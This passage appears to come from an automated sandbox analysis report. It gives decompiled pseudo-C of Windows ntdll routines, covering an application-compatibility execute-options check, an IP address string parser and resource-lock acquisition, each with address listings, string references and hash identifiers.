					_t75 = _t74 + 0x20;
					_t46 =  *0x9d4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00943F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00900D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00943F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00908375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00943F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0096E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00943F92();
					_t38 = 1;
					L2:
					return E008FE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                0x00927f08
                                                0x00927f0f
                                                0x00927f12
                                                0x00927f1b
                                                0x00927f31
                                                0x00943ead
                                                0x00943eb4
                                                0x00000000
                                                0x00000000
                                                0x00943eba
                                                0x00943ecd
                                                0x00943ed2
                                                0x00943ee1
                                                0x00943ee7
                                                0x00943eec
                                                0x00943f12
                                                0x00943f18
                                                0x00943f1a
                                                0x00000000
                                                0x00000000
                                                0x00943f20
                                                0x00943f26
                                                0x00943f28
                                                0x00000000
                                                0x00000000
                                                0x00943f2e
                                                0x00943f30
                                                0x00000000
                                                0x00000000
                                                0x00943f3a
                                                0x00943f3b
                                                0x00943f53
                                                0x00943f64
                                                0x00943f69
                                                0x00943f6c
                                                0x00943f6d
                                                0x00943f6f
                                                0x0094e304
                                                0x0094e30f
                                                0x0094e315
                                                0x0094e31e
                                                0x0094e321
                                                0x0094e327
                                                0x0094e329
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0094e32f
                                                0x0094e32f
                                                0x0094e337
                                                0x0094e33a
                                                0x0094e33b
                                                0x0094e33d
                                                0x0094e33f
                                                0x0094e341
                                                0x0094e341
                                                0x0094e34e
                                                0x0094e353
                                                0x0094e358
                                                0x0094e35d
                                                0x0094e35f
                                                0x00000000
                                                0x00000000
                                                0x0094e365
                                                0x0094e365
                                                0x0094e368
                                                0x0094e36e
                                                0x00000000
                                                0x00000000
                                                0x0094e374
                                                0x0094e32f
                                                0x00943f75
                                                0x00943f7a
                                                0x00943f7c
                                                0x00943f7e
                                                0x00943f86
                                                0x00927f39
                                                0x00927f47
                                                0x00927f47
                                                0x00927f37
                                                0x00927f37
                                                0x00000000

                                                APIs
                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00943F12
                                                Strings
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0094E2FB
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 0094E345
                                                • ExecuteOptions, xrefs: 00943F04
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00943F75
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00943F4A
                                                • Execute=1, xrefs: 00943F5E
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00943EC4
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: BaseDataModuleQuery
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 3901378454-484625025
                                                • Opcode ID: 6dad5cd6323db766408e7ec945a7acd3e24d91867e51392735d54755b4bf6968
                                                • Instruction ID: 264fbb8a8739196c298eabb004e0e084f6b02b205d68a0bbbff351df7b1267b5
                                                • Opcode Fuzzy Hash: 6dad5cd6323db766408e7ec945a7acd3e24d91867e51392735d54755b4bf6968
                                                • Instruction Fuzzy Hash: 3D419771A8421D7BDF20AAA4DC86FEAB3BCAF54700F0005A9B615F6191EA709B458F61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00930B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00930B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00908980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E008FDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00930CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00930CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E009306BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E009306BA(_t135, _t178) == 0 || E00930A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00930CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00930CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E009306BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E009306BA(_t124, _t142) == 0 || E00930A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                0x00930b21
                                                0x00930b24
                                                0x00930b27
                                                0x00930b2a
                                                0x00930b2d
                                                0x00930b30
                                                0x00930b33
                                                0x00930b36
                                                0x00930b39
                                                0x00930b3e
                                                0x00930c65
                                                0x00930c68
                                                0x00930c6a
                                                0x00930c6f
                                                0x0095eb42
                                                0x00000000
                                                0x00000000
                                                0x0095eb48
                                                0x0095eb48
                                                0x00930c75
                                                0x00930c7a
                                                0x0095eb54
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095eb5a
                                                0x00930c80
                                                0x00930c84
                                                0x0095eb98
                                                0x00000000
                                                0x00000000
                                                0x0095eba6
                                                0x00930cb8
                                                0x00930cba
                                                0x00930cd3
                                                0x00930cda
                                                0x00930ce4
                                                0x00930ce9
                                                0x00000000
                                                0x00930cec
                                                0x00930c8c
                                                0x0095eb63
                                                0x00000000
                                                0x00000000
                                                0x0095eb70
                                                0x0095eb75
                                                0x0095eb7d
                                                0x00000000
                                                0x00000000
                                                0x0095eb8c
                                                0x00000000
                                                0x0095eb8c
                                                0x00930c96
                                                0x00000000
                                                0x00000000
                                                0x00930ca2
                                                0x00930cac
                                                0x00930cb4
                                                0x00000000
                                                0x00000000
                                                0x00930b44
                                                0x00930b47
                                                0x00930b49
                                                0x00000000
                                                0x00000000
                                                0x00930b4f
                                                0x00930b50
                                                0x00000000
                                                0x00000000
                                                0x00930b56
                                                0x00930b62
                                                0x00930b7c
                                                0x00930bac
                                                0x00930a0f
                                                0x0095eaaa
                                                0x00000000
                                                0x0095eac4
                                                0x0095eac4
                                                0x00930bd0
                                                0x00930bd0
                                                0x00930bd4
                                                0x00930bd9
                                                0x00000000
                                                0x00000000
                                                0x00930bdb
                                                0x00930be0
                                                0x0095eb0e
                                                0x00930a1a
                                                0x00000000
                                                0x00930a1a
                                                0x0095eb1a
                                                0x0095eb1f
                                                0x0095eb27
                                                0x00000000
                                                0x00000000
                                                0x0095eb36
                                                0x00000000
                                                0x0095eb36
                                                0x00930bea
                                                0x00000000
                                                0x00000000
                                                0x00930bf6
                                                0x00930c00
                                                0x00930c03
                                                0x00930c0b
                                                0x00000000
                                                0x00930c0b
                                                0x0095eaaa
                                                0x00000000
                                                0x00930a15
                                                0x00930bb6
                                                0x00000000
                                                0x00930bc6
                                                0x00930bc6
                                                0x00930bcb
                                                0x00930c15
                                                0x00000000
                                                0x00000000
                                                0x00930c1d
                                                0x00930c20
                                                0x00930c21
                                                0x00930c24
                                                0x00930c24
                                                0x00930c26
                                                0x00000000
                                                0x00930c26
                                                0x00930bcd
                                                0x00000000
                                                0x00930bcd
                                                0x00930b89
                                                0x00930b89
                                                0x00930b90
                                                0x00000000
                                                0x00000000
                                                0x00930b96
                                                0x00000000
                                                0x00930b96
                                                0x00930a04
                                                0x00930a04
                                                0x00930b9a
                                                0x00930b9a
                                                0x00930b9b
                                                0x00930b9f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00930ba5
                                                0x00930ac7
                                                0x00930aca
                                                0x0095eacf
                                                0x00000000
                                                0x0095eade
                                                0x0095eade
                                                0x0095eae3
                                                0x00000000
                                                0x00000000
                                                0x0095eaf3
                                                0x0095eaf6
                                                0x0095eaf7
                                                0x0095eafe
                                                0x0095eb01
                                                0x00000000
                                                0x0095eb01
                                                0x0095eacf
                                                0x00930ad0
                                                0x00930ad4
                                                0x00000000
                                                0x00000000
                                                0x00930ada
                                                0x00930ae6
                                                0x00930c34
                                                0x00000000
                                                0x00930c47
                                                0x00930c49
                                                0x00930c4a
                                                0x00930c4e
                                                0x00930c51
                                                0x00930c54
                                                0x00930c57
                                                0x00930c5a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00930c60
                                                0x00930afb
                                                0x00930afe
                                                0x00930b02
                                                0x00930b05
                                                0x00930b08
                                                0x00000000
                                                0x00930b08
                                                0x00930ae6
                                                0x00930b44
                                                0x009309f8
                                                0x009309f8
                                                0x009309f9
                                                0x00000000
                                                0x00000000
                                                0x0095eaa0
                                                0x00000000

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: __fassign
                                                • String ID: .$:$:
                                                • API String ID: 3965848254-2308638275
                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction ID: f93042f75d9a8919b30cf36c6e9a550797723b147552b4e69bd2222ce0f4854f
                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction Fuzzy Hash: F7A1BC71D0030AEFDF24CF64C8657BEB7B9AF95305F28856AD882A7282D7349A41CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00930554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 49%
                                                			E00930554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009d01c0;
									_push(_t144);
									_push(0);
									_t51 = E008EF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00934FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00943F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00943F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0097217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00943F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00933915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009d01c0;
												_push(_t138);
												_push(0);
												_t58 = E008EF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00934FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00943F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00943F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0097217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00943F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00933915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00915384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E008EF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00933915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E008EF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00933915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E008EF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00933915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E00915329(_t110, _t138);
																return E009153A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                                0x0093055a
                                                0x0093055d
                                                0x00930563
                                                0x00930566
                                                0x009305d8
                                                0x009305e2
                                                0x009305e5
                                                0x00000000
                                                0x009305e7
                                                0x009305e7
                                                0x009305ea
                                                0x009305f3
                                                0x009305f3
                                                0x00930568
                                                0x00930568
                                                0x00930568
                                                0x00930569
                                                0x00930569
                                                0x00930569
                                                0x0093056b
                                                0x00000000
                                                0x00000000
                                                0x0095217f
                                                0x00952183
                                                0x0095225b
                                                0x0095225f
                                                0x00952189
                                                0x0095218c
                                                0x0095218f
                                                0x00952194
                                                0x00952199
                                                0x0095219d
                                                0x009521a0
                                                0x009521a2
                                                0x009521ce
                                                0x009521ce
                                                0x009521ce
                                                0x009521d0
                                                0x009521d6
                                                0x009521de
                                                0x009521e2
                                                0x009521e8
                                                0x009521e9
                                                0x009521ec
                                                0x009521f1
                                                0x009521f6
                                                0x00000000
                                                0x00000000
                                                0x009521f8
                                                0x009521fb
                                                0x00952206
                                                0x0095220b
                                                0x0095220c
                                                0x00952217
                                                0x00952226
                                                0x0095222b
                                                0x0095222c
                                                0x0095222f
                                                0x00952232
                                                0x00952235
                                                0x00952235
                                                0x0095223a
                                                0x0095223f
                                                0x00952241
                                                0x00952243
                                                0x00952248
                                                0x00952248
                                                0x0095224d
                                                0x0095224f
                                                0x00952262
                                                0x00952263
                                                0x00952268
                                                0x00952269
                                                0x00952269
                                                0x00952269
                                                0x0095226d
                                                0x00000000
                                                0x00000000
                                                0x00952276
                                                0x00952279
                                                0x0095227e
                                                0x00952283
                                                0x00952287
                                                0x0095228a
                                                0x0095228d
                                                0x0095228f
                                                0x009522bc
                                                0x009522bc
                                                0x009522bc
                                                0x009522be
                                                0x009522c4
                                                0x009522cc
                                                0x009522d0
                                                0x009522d6
                                                0x009522d7
                                                0x009522da
                                                0x009522df
                                                0x009522e4
                                                0x00000000
                                                0x00000000
                                                0x009522e6
                                                0x009522e9
                                                0x009522f4
                                                0x009522f9
                                                0x009522fa
                                                0x00952305
                                                0x00952314
                                                0x00952319
                                                0x0095231a
                                                0x0095231d
                                                0x00952320
                                                0x00952323
                                                0x00952323
                                                0x00952328
                                                0x0095232d
                                                0x0095232f
                                                0x00952331
                                                0x00952336
                                                0x00952336
                                                0x0095233b
                                                0x0095233d
                                                0x00952350
                                                0x00952351
                                                0x00952356
                                                0x00952359
                                                0x00952359
                                                0x0095235b
                                                0x0095235d
                                                0x00915367
                                                0x0091536b
                                                0x00915372
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00952363
                                                0x00952363
                                                0x00952369
                                                0x0095236a
                                                0x0095236c
                                                0x00952371
                                                0x00952373
                                                0x00000000
                                                0x00952379
                                                0x00952379
                                                0x0095237a
                                                0x0095237f
                                                0x0095237f
                                                0x00952385
                                                0x00952386
                                                0x00952389
                                                0x0095238e
                                                0x00952390
                                                0x00915378
                                                0x0091537c
                                                0x00952396
                                                0x00952396
                                                0x00952397
                                                0x0095239c
                                                0x009523a2
                                                0x009523a3
                                                0x009523a6
                                                0x009523ab
                                                0x009523ad
                                                0x00000000
                                                0x009523b3
                                                0x009523b3
                                                0x009523b4
                                                0x009523b9
                                                0x009523ba
                                                0x009523ba
                                                0x009523bc
                                                0x009523bf
                                                0x00000000
                                                0x00000000
                                                0x00949153
                                                0x00949158
                                                0x0094915a
                                                0x0094915e
                                                0x00949160
                                                0x00000000
                                                0x00949166
                                                0x00949166
                                                0x00949171
                                                0x00949176
                                                0x00949176
                                                0x00000000
                                                0x00949160
                                                0x009523c6
                                                0x009523d7
                                                0x009523d7
                                                0x009523ad
                                                0x00952390
                                                0x00952373
                                                0x0095233f
                                                0x0095233f
                                                0x00000000
                                                0x0095233f
                                                0x00952291
                                                0x00952291
                                                0x00952293
                                                0x00952295
                                                0x0095229a
                                                0x009522a1
                                                0x009522a3
                                                0x009522a7
                                                0x009522a9
                                                0x00000000
                                                0x00000000
                                                0x009522ab
                                                0x009522ad
                                                0x009522af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009522af
                                                0x009522b1
                                                0x009522b4
                                                0x009522b4
                                                0x009522b6
                                                0x009153be
                                                0x009153be
                                                0x009153be
                                                0x009153c0
                                                0x00000000
                                                0x00000000
                                                0x009153cb
                                                0x009153ce
                                                0x009153d0
                                                0x009153d4
                                                0x009153d6
                                                0x00000000
                                                0x009153d8
                                                0x009153e3
                                                0x009153ea
                                                0x009153ea
                                                0x00000000
                                                0x009153d6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009522b6
                                                0x00000000
                                                0x0095228f
                                                0x00952349
                                                0x0095234d
                                                0x00952251
                                                0x00952251
                                                0x00000000
                                                0x00952251
                                                0x009521a4
                                                0x009521a4
                                                0x009521a6
                                                0x009521a8
                                                0x009521ac
                                                0x009521b6
